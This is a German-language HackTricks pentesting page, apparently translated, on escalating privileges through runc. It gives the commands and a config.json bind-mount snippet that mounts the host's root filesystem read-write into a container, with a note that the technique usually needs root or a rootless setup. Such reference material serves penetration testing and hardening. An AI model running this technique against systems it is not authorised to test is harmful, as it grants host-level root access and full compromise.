RunC Privilege Escalation

Lernen Sie AWS-Hacking von Grund auf mit htARTE (HackTricks AWS Red Team Expert)!

Andere Möglichkeiten, HackTricks zu unterstützen:

Grundlegende Informationen

Wenn Sie mehr über runc erfahren möchten, lesen Sie die folgende Seite:

page2375, 2376 Pentesting Docker

PE

Wenn Sie feststellen, dass runc auf dem Host installiert ist, können Sie möglicherweise einen Container ausführen, der das Stammverzeichnis (/) des Hosts einbindet.

runc -help #Get help and see if runc is intalled
runc spec #This will create the config.json file in your current folder

Inside the "mounts" section of the create config.json add the following lines:
{
"type": "bind",
"source": "/",
"destination": "/",
"options": [
"rbind",
"rw",
"rprivate"
]
},

#Once you have modified the config.json file, create the folder rootfs in the same directory
mkdir rootfs

# Finally, start the container
# The root folder is the one from the host
runc run demo

Dies funktioniert nicht immer, da die Standardfunktion von runc darin besteht, als Root-Benutzer ausgeführt zu werden. Daher kann es einfach nicht funktionieren, es als nicht privilegierter Benutzer auszuführen (es sei denn, Sie haben eine rootless-Konfiguration). Eine rootless-Konfiguration als Standard festzulegen, ist im Allgemeinen keine gute Idee, da es in rootless-Containern einige Einschränkungen gibt, die außerhalb von rootless-Containern nicht gelten.

Lernen Sie AWS-Hacking von Grund auf mit htARTE (HackTricks AWS Red Team Expert)!

Andere Möglichkeiten, HackTricks zu unterstützen:

Last updated